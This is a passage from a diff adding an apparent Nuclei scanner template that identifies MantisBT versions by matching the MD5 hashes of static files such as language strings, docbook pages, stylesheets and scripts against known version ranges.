"(\"dcb9c661b6afd8652330d1d628d5d65d\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_interlingua.txt" + + matchers: + - type: dsl + name: 2.2.0 - 2.22.2 + dsl: + - "(\"8d518d31666725f9dc1c6e8edb430f03\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"05dccc39f7c1e7a937906aa2f428386a\" == md5(body))" + - type: dsl + name: 1.3.5 - 2.0.1 + dsl: + - "(\"ab83665f4a4b796399af8cc9e8bce5a6\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.4 + dsl: + - "(\"71f8d019bc739b8c6d98cb61b8c0c954\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"7b13b3afabb1ed7a04050d40109a2884\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"ad6dd27efc7e576e14b455bf441b311a\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"e1c7a445af80f1015906d9be6078faac\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"aafd27eec12c5771536eb46bfed383b9\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"8c977855e40c0d047c9425386c504a50\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"ffe0bfe2f38fb5da0a4a90f863a4b150\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"5769fd3444c5473aaea529d109bb9063\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_icelandic.txt" + + matchers: + - type: dsl + name: 2.0.0 - 2.13.2 + dsl: + - "(\"40ae7cdf88ae6277f2f67f8c46af8992\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.20 + dsl: + - "(\"3ec3ed9fb8f61c767713769a37ce1f6d\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"12f14695e9c7a04193d3fe5595b505d3\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"3d6cc75e71433eba9799149fc0e14c21\" == md5(body))" + - type: dsl + name: 2.14.0 - 2.20.1 + dsl: + - "(\"150d4f140d6321876cfa5a40056f6ee6\" == md5(body))" + - type: dsl + name: 2.21.0 - 2.22.2 + dsl: + - "(\"2cdf31ccc3d2420c582866fea25a0683\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"28b6e4ba893adccaa57a8b0d0971190c\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/config/issues.xml" + + matchers: + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"0f0a30cce4bdb0ee416d1b939b9ca779\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_persian.txt" + + matchers: + - type: dsl + name: 2.22.0 - 2.23.1 + dsl: + - "(\"5ac2f1b3d1641f83ddc55de1709bfcbc\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"2f9981140bb9f61809bba91340072428\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/config/misc.xml" + + matchers: + - type: dsl + name: 1.3.6 - 2.21.3 + dsl: + - "(\"632ffaaa7a981b6b001d69d94d1c9e1b\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.0.0 + dsl: + - "(\"e50df586cdd84c97152da054d5198230\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.23.1 + dsl: + - "(\"228397b5b994b8f8f0c5c2029ec410ca\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"1d7c734d9f8b53758e15c93f434fae65\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/config/fields.xml" + + matchers: + - type: dsl + name: 2.0.0 - 2.21.3 + dsl: + - "(\"93c59f9f0ac3edb792a4ec260384f93f\" == md5(body))" + - type: dsl + name: 1.3.3 - 1.3.20 + dsl: + - "(\"682de029cbce120a2ebc51d6b120dfb1\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.2 + dsl: + - "(\"64a6294acb6e29f03c36b36ae7383ed0\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.23.1 + dsl: + - "(\"e0fed3bbeba6001fbe0f76b8042e3ab9\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"23d9a60748432647834950991be717a0\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Developers_Guide/en-US/Events_Reference_Output.xml" + + matchers: + - type: dsl + name: 2.0.0 - 2.20.1 + dsl: + - "(\"f5ecc5d11cbbf520b3e4223816b3a1ee\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.20 + dsl: + - "(\"f1531362f17786a8fae8e5d44e8b7dd8\" == md5(body))" + - type: dsl + name: 2.21.0 - 2.21.3 + dsl: + - "(\"12e022147004a0c33bb36d3be7ec7ac9\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.23.1 + dsl: + - "(\"18cde9b4b10109ce9f25cc54af7d1c7b\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"32a71421fcf28788e35878376f1da1f9\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/Gravatar/lang/strings_zazaki.txt" + + matchers: + - type: dsl + name: 2.20.0 - 2.23.1 + dsl: + - "(\"0faa8557c38cf0224c12533bd78fb654\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"6b63f88efbd2d8f5faa1cad43023f754\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_afrikaans.txt" + + matchers: + - type: dsl + name: 2.1.0 - 2.7.1 + dsl: + - "(\"13599ef0e44b6a236aad020665f01c1c\" == md5(body))" + - type: dsl + name: 1.3.4 - 2.0.1 + dsl: + - "(\"6fa122065eeaa7e0544331cf2b5f73de\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.3 + dsl: + - "(\"d62f46a7e762cbbc42925483a9f37e2f\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"682273c4fed4e3c765a86ec7cfe54cac\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"9c47675a9ef2ece2d6424f91dfb855ca\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"e2108a79492cd2a8067a4c7ba658f0d7\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"3bbceecb26e4878d81c32d59f2ea356c\" == md5(body))" + - type: dsl + name: 1.2.15 - 1.2.16 + dsl: + - "(\"eb03c428fcaa070bfc6e423198411e55\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.14 + dsl: + - "(\"5fe0ccede0c06b94e4c1a18d0bb2f638\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"ca6e0c178ec16b7f44daef3b47f4a71a\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"c78d430f96b31485e671d87bc45de19b\" == md5(body))" + - type: dsl + name: 2.8.0 - 2.15.1 + dsl: + - "(\"578b4cbd487132e683217d6b2ad90f19\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.19.1 + dsl: + - "(\"9d4b3287550e20f07298a34ae8d20ae8\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.23.1 + dsl: + - "(\"c690111ce44ce81333a757bd8a3a85f5\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"060623b456c6cd8da7d9801cbbe01a94\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/default.css" + + matchers: + - type: dsl + name: 2.1.0 - 2.6.0 + dsl: + - "(\"40e80256589f10ff85fc4d6d2c7057ac\" == md5(body))" + - type: dsl + name: 2.0.0 - 2.0.1 + dsl: + - "(\"6263ab7767d862b607b681b046e258e3\" == md5(body))" + - type: dsl + name: 1.3.2 - 1.3.20 + dsl: + - "(\"c6286024c6bac2a42f378735e22fa5dc\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"456ac3fdffaaa9763f41f9eb196c8dc0\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.20 + dsl: + - "(\"2e8a20b72e96469fa8ca7d8c6fcb942d\" == md5(body))" + - type: dsl + name: 1.2.4 - 1.2.8 + dsl: + - "(\"ff7ffbca824e59104861bf01b114acf5\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.3 + dsl: + - "(\"61f431d3e70d189eed4873957d0b6e8e\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"5cd93ac8bf8050829d7820ad5110f8a0\" == md5(body))" + - type: dsl + name: 1.0.0 - 1.0.8 + dsl: + - "(\"c354ad3077a466ea8f31db696a8809de\" == md5(body))" + - type: dsl + name: 2.7.0 - 2.10.1 + dsl: + - "(\"6770dcc01572e26a45f7e7e7d4638445\" == md5(body))" + - type: dsl + name: 2.11.0 - 2.16.1 + dsl: + - "(\"5db0b0071d9519cb3ff9e0a4ea26d8c9\" == md5(body))" + - type: dsl + name: 2.17.0 - 2.19.1 + dsl: + - "(\"e759620c3576b28bb8d6684c589adf86\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.23.1 + dsl: + - "(\"5863829f5d7132947649aeb19ca8a178\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"92662c4846d16e85b73a931a8e59bd0e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/config/logging.xml" + + matchers: + - type: dsl + name: 1.3.0 - 2.6.0 + dsl: + - "(\"55e330c562f4f26041796c7355d113d8\" == md5(body))" + - type: dsl + name: 2.7.0 - 2.10.1 + dsl: + - "(\"5a609d9245505fa633ed42154d1d4ce3\" == md5(body))" + - type: dsl + name: 2.11.0 - 2.23.1 + dsl: + - "(\"c7578647f1446154e0bc49a9ed488950\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"a97f268775bb49c5e7058ea5bf892d0c\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/api/rest/swagger.json" + + matchers: + - type: dsl + name: 2.3.0 - 2.23.1 + dsl: + - "(\"265858681431f502ee5c2934919676cc\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"ea9bf2e216211e28926916ab06ad48ee\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/Configuration.xml" + + matchers: + - type: dsl + name: 2.3.0 - 2.23.1 + dsl: + - "(\"2bbf1c5f911707695a5de293cb6a9e57\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.2.4 + dsl: + - "(\"fac27ba3fdc583733e68d48da2887910\" == md5(body))" + - type: dsl + name: 2.0.0 - 2.0.1 + dsl: + - "(\"37878dc0cb09f6b0e3898fce625e7c8e\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.20 + dsl: + - "(\"855df66cd68b2785ef03e0016bdc05c4\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"93d6b0ee42bf9147c319e4458382a546\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/config/duedate.xml" + + matchers: + - type: dsl + name: 1.3.0 - 2.23.1 + dsl: + - "(\"913a6fee919408a7bb57317ae11a10ba\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"6fa96f9d2be88abb9163bd8d620a3e6c\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/config/auth.xml" + + matchers: + - type: dsl + name: 1.3.0 - 2.20.1 + dsl: + - "(\"06cf270582f43790caf31b25f69ae024\" == md5(body))" + - type: dsl + name: 2.21.0 - 2.23.1 + dsl: + - "(\"ff99f137a1f5b325805eca88df9a504d\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"cabe500502fef31d627ef789eb5de8fd\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_persian.txt" + + matchers: + - type: dsl + name: 2.12.0 - 2.21.3 + dsl: + - "(\"fcbf98c8267756c91b3bc45baba6bfa8\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.22.2 + dsl: + - "(\"c5f695f59150e79374818e3de06cbcdb\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.23.1 + dsl: + - "(\"658fe73f1545f4b99ebc21716f6de491\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"9ebe86925add4dc52e87099e08cfa5fc\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_zazaki.txt" + + matchers: + - type: dsl + name: 2.12.0 - 2.14.0 + dsl: + - "(\"7bc4b7761e53abeb83979d7ea51685cf\" == md5(body))" + - type: dsl + name: 2.15.0 - 2.18.1 + dsl: + - "(\"659ad959229ea58640f6b17962dd01c9\" == md5(body))" + - type: dsl + name: 2.19.0 - 2.19.1 + dsl: + - "(\"a40839d9fc5039b0b8d45120691d5585\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.20.1 + dsl: + - "(\"dae2c2c101fade7b30a8ef2e4040ef19\" == md5(body))" + - type: dsl + name: 2.21.0 - 2.21.3 + dsl: + - "(\"55bad46878536b7b4d63820809e8f465\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.22.2 + dsl: + - "(\"74574a16febbb1b6583d5d93e4215d2b\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.23.1 + dsl: + - "(\"068802ca4bea742f97ee8fce5880647c\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"86348e2f074590b8d12c2177073f78a4\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_french.txt" + + matchers: + - type: dsl + name: 2.6.0 - 2.19.1 + dsl: + - "(\"30502c4a3c906a4a60568ebfbeea1794\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.5.2 + dsl: + - "(\"253fbb67bb9771ec13f0bc730ba44c43\" == md5(body))" + - type: dsl + name: 1.3.4 - 2.0.1 + dsl: + - "(\"950b71af1e2a6e2aa67b2dc576a36d87\" == md5(body))" + - type: dsl + name: 1.3.2 - 1.3.3 + dsl: + - "(\"fc4c38b2eca12f29c8183b671ca899b2\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"58e261f2e972aa7e01f43d6c57fbd104\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"1cd24a892556f7426b72faadecfea1d2\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"2c7a4dc0e0c3dfa51d548ab0c633e5a8\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"08b2ee9e015dd114de51a9af3c23ec84\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"632b3b35e3ff738607b066b38155fe0c\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"31316011abd00e3abd7bb21ea88cf738\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"aaad4f5d9ffe9f6f90a7411e26688428\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"50e2203fb603c7a3e87066133fc85cee\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.22.2 + dsl: + - "(\"7d7eddf0f526f03fba0d1872f9eaaf1e\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.23.1 + dsl: + - "(\"364c8d0db32ab7d864edaf29294bc0a3\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"cde1486dbe1bb3af3914d1197b385a80\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/Gravatar/lang/strings_french.txt" + + matchers: + - type: dsl + name: 2.12.0 - 2.22.2 + dsl: + - "(\"af783a5ca3d0846b7d18d559436691d7\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.23.1 + dsl: + - "(\"271e862967725c7f2b9e2092699a0cbf\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"55116e7cd337cd4bb54f97e04820e830\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_turkish.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.22.2 + dsl: + - "(\"eff4c2ce0331684382cd8af7496e8c47\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.12 + dsl: + - "(\"3d799432747085c13c33fc81c87d90cd\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"789ccd823367987be275a66e3fe83eb4\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"23d622eea7ff0a64283baec6422a9c08\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"07a58840d1fca8d1813cd665a6066fa1\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.23.1 + dsl: + - "(\"6f519144f23f5bf1ac9af2f40f3a2148\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"d3c6d750bcbe05cc0d10e1dbb961230e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_turkish.txt" + + matchers: + - type: dsl + name: 2.1.0 - 2.22.2 + dsl: + - "(\"6260920c9e998905fa3eca3c357729b9\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.0.1 + dsl: + - "(\"4bd5d2ee4b71d68d1299083071d84d6e\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.12 + dsl: + - "(\"8a890a847f79b747bacc0ff6c38cacb7\" == md5(body))" + - type: dsl + name: 1.2.6 - 1.2.8 + dsl: + - "(\"d0eb765170448f8c031db321134d70f8\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"270e03b64a3b7a1d15fcbd29d6d44543\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"5f84cca91c132b0ef586c14cb87996a2\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.23.1 + dsl: + - "(\"3a16dd8993fb21e49d9185588e416c34\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"1e7c8dd10b3edff564a0dd3283429bef\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_french.txt" + + matchers: + - type: dsl + name: 2.6.0 - 2.8.1 + dsl: + - "(\"1e2e43529f07ed1f2e3c08369d3ff7d6\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.5.2 + dsl: + - "(\"8d17dfa19af6aa59b82af76b11a432d8\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.0.1 + dsl: + - "(\"c8acc552792a4cc7ed6d68f24e8ad8f6\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"bc2cc130a53115b043ebb0ccbe8b6b40\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"cfc4e8104a823b3fb98dca32a629f3ef\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"34e8ab9b4e51fd625f538c8be54fc9c1\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"cadcc72e53ff4abf8f6a1d55702119d7\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"06812393f39880632304416234f9999c\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"ee9d8596b5a983eb2bf96eaf79c8e7b0\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"9c9a5da1458961631347089b04637e99\" == md5(body))" + - type: dsl + name: 2.9.0 - 2.22.2 + dsl: + - "(\"1723a68aea01468a07b30f27b382153e\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.23.1 + dsl: + - "(\"e52bc4894e15fcc101665ba5d5ca4390\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"0ca28906aaa1fd4235a3185b80cb4530\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/js/bootstrap-3.4.1.min.js" + + matchers: + - type: dsl + name: 2.22.1 - 2.24.3 + dsl: + - "(\"2f34b630ffe30ba2ff2b91e3f3c322a1\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/js/bootstrap-3.4.1.js" + + matchers: + - type: dsl + name: 2.22.1 - 2.24.3 + dsl: + - "(\"894d79839facf38d9fd672bdbe57443d\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/bootstrap-3.4.1.min.css" + + matchers: + - type: dsl + name: 2.22.1 - 2.24.3 + dsl: + - "(\"14d87c40a69b42fe5abd92585f449071\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/bootstrap-3.4.1.css" + + matchers: + - type: dsl + name: 2.22.1 - 2.24.3 + dsl: + - "(\"901ab23124f862a178e724bfccf4659d\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_eo.txt" + + matchers: + - type: dsl + name: 2.22.0 - 2.24.3 + dsl: + - "(\"3545c62aad53dc85608953831817b3a3\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/Gravatar/lang/strings_eo.txt" + + matchers: + - type: dsl + name: 2.22.0 - 2.24.3 + dsl: + - "(\"a81b149320b12fdc74d1f2760655c555\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_eo.txt" + + matchers: + - type: dsl + name: 2.22.0 - 2.24.3 + dsl: + - "(\"1fc982adba0892cd015d1624278b15ec\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_eo.txt" + + matchers: + - type: dsl + name: 2.22.0 - 2.24.3 + dsl: + - "(\"ea2b7202d5eea8b94b4e0ca86341fd3a\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/files/chartjs-plugin-colorschemes-0.4.0.min.js" + + matchers: + - type: dsl + name: 2.22.0 - 2.24.3 + dsl: + - "(\"1334459753dbd8da4dfd2e833d1be02e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/files/Chart.bundle-2.8.0.min.js" + + matchers: + - type: dsl + name: 2.22.0 - 2.24.3 + dsl: + - "(\"bd9843d1866f45d1406a12f7de05f9ff\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/files/Chart-2.8.0.min.js" + + matchers: + - type: dsl + name: 2.22.0 - 2.24.3 + dsl: + - "(\"b235b564de9c2c1d61d7ef07fcf2b93b\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/Gravatar/README.md" + + matchers: + - type: dsl + name: 1.3.0 - 2.21.3 + dsl: + - "(\"8742be2b99053e91c171a5620a64632c\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.24.3 + dsl: + - "(\"2871c0c748556c088c435d33dab74622\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/Troubleshooting.xml" + + matchers: + - type: dsl + name: 2.6.0 - 2.21.3 + dsl: + - "(\"b87db12769543586752d4b2001c26687\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.5.2 + dsl: + - "(\"b063103a250d7d03c3093961cfdfcb43\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.24.3 + dsl: + - "(\"b212c0f51c8d1f673c6250a459c56fcd\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/composer.json" + + matchers: + - type: dsl + name: 2.6.0 - 2.7.1 + dsl: + - "(\"993cbb78b59c7898476aadbfb3a35691\" == md5(body))" + - type: dsl + name: 2.5.0 - 2.5.2 + dsl: + - "(\"3aab133baab4deb5e5fdf3e6b0ae7675\" == md5(body))" + - type: dsl + name: 2.3.0 - 2.4.2 + dsl: + - "(\"8bf8b6ef1320aac36cbd02fde721f4b6\" == md5(body))" + - type: dsl + name: 2.8.0 - 2.12.0 + dsl: + - "(\"989571ee1f2dd6a4ebeb3604c812ca18\" == md5(body))" + - type: dsl + name: 2.12.1 - 2.18.1 + dsl: + - "(\"ec85953b5881a69e624706b6dac75e85\" == md5(body))" + - type: dsl + name: 2.19.0 - 2.21.3 + dsl: + - "(\"8d4ac55900fc09d8aac6827ad24a8d40\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.24.3 + dsl: + - "(\"d82696f29e00ea7bd5d3ee778fafd1f6\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/Customizing.xml" + + matchers: + - type: dsl + name: 2.3.0 - 2.12.2 + dsl: + - "(\"f42f72975886f16b1368cd61fa8c0fcd\" == md5(body))" + - type: dsl + name: 2.2.1 - 2.2.4 + dsl: + - "(\"ef89eb6929b3829c8f81b78968d0fa2d\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.2.0 + dsl: + - "(\"d154c4f3b2950c95889cd923430df101\" == md5(body))" + - type: dsl + name: 1.3.3 - 2.0.1 + dsl: + - "(\"44edc2df0f979a689b55285f38b6ac44\" == md5(body))" + - type: dsl + name: 1.3.7 - 1.3.20 + dsl: + - "(\"a23e1b906502145dde5ffc950f6a236a\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.2 + dsl: + - "(\"bb20666d9a123fe8d3da13f32db1ddcb\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.19.1 + dsl: + - "(\"61340e06e8aefb485c3ff00c197a0438\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.20.1 + dsl: + - "(\"b902a4c1358b9ffef26cb306b9a5bc48\" == md5(body))" + - type: dsl + name: 2.21.0 - 2.21.3 + dsl: + - "(\"f987e2f4800396041ac2591cabb9372e\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.24.3 + dsl: + - "(\"a275ea5141aa81835a35d0092b5bacc8\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_sh.txt" + + matchers: + - type: dsl + name: 2.20.0 - 2.24.3 + dsl: + - "(\"fe8f957689429d9f7dc124024e8c0640\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/files/chartjs-plugin-colorschemes.min.js" + + matchers: + - type: dsl + name: 2.20.0 - 2.21.3 + dsl: + - "(\"15d3cd8669d148d1969ef4f509cefb98\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/files/Chart.bundle-2.7.3.min.js" + + matchers: + - type: dsl + name: 2.20.0 - 2.21.3 + dsl: + - "(\"20611fc0031bee55b8cb6e99aad851b7\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/files/Chart-2.7.3.min.js" + + matchers: + - type: dsl + name: 2.20.0 - 2.21.3 + dsl: + - "(\"97fc24605ac8278c6097b48ae533bf8a\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/api/rest/web.config" + + matchers: + - type: dsl + name: 2.20.0 - 2.24.3 + dsl: + - "(\"fa20e7a3d07825291e3d16853f88b9ca\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/bootstrap-3.4.0.min.css" + + matchers: + - type: dsl + name: 2.20.0 - 2.22.0 + dsl: + - "(\"9568d6466155669e72ed389ebb1d22f3\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/dropzone-5.5.0.css" + + matchers: + - type: dsl + name: 2.20.0 - 2.24.3 + dsl: + - "(\"5e018ddcbacdc772d8ad3f48b8615657\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/dropzone-5.5.0.min.css" + + matchers: + - type: dsl + name: 2.20.0 - 2.24.3 + dsl: + - "(\"2f735dbf472afcd77604ecf439319f7b\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/bootstrap-3.4.0.css" + + matchers: + - type: dsl + name: 2.20.0 - 2.22.0 + dsl: + - "(\"ed23e508d5ce12c5e740269f184a3288\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/js/bootstrap-3.4.0.min.js" + + matchers: + - type: dsl + name: 2.20.0 - 2.22.0 + dsl: + - "(\"3d8308804264c5b751f6e54734c46897\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/js/dropzone-5.5.0.js" + + matchers: + - type: dsl + name: 2.20.0 - 2.24.3 + dsl: + - "(\"14baa29ec8f91f6c72042dcc03e5d650\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/js/dropzone-5.5.0.min.js" + + matchers: + - type: dsl + name: 2.20.0 - 2.24.3 + dsl: + - "(\"cd479c28585ae8ebaa56189b30780e69\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/js/bootstrap-3.4.0.js" + + matchers: + - type: dsl + name: 2.20.0 - 2.22.0 + dsl: + - "(\"4919e6382103a157b088dd6b03478b83\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/js/manage_proj_edit_page.js" + + matchers: + - type: dsl + name: 2.20.0 - 2.24.3 + dsl: + - "(\"5ee86a1eee5c2bbc3e88bb3909aeff3c\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/js/list-1.5.0.js" + + matchers: + - type: dsl + name: 2.20.0 - 2.24.3 + dsl: + - 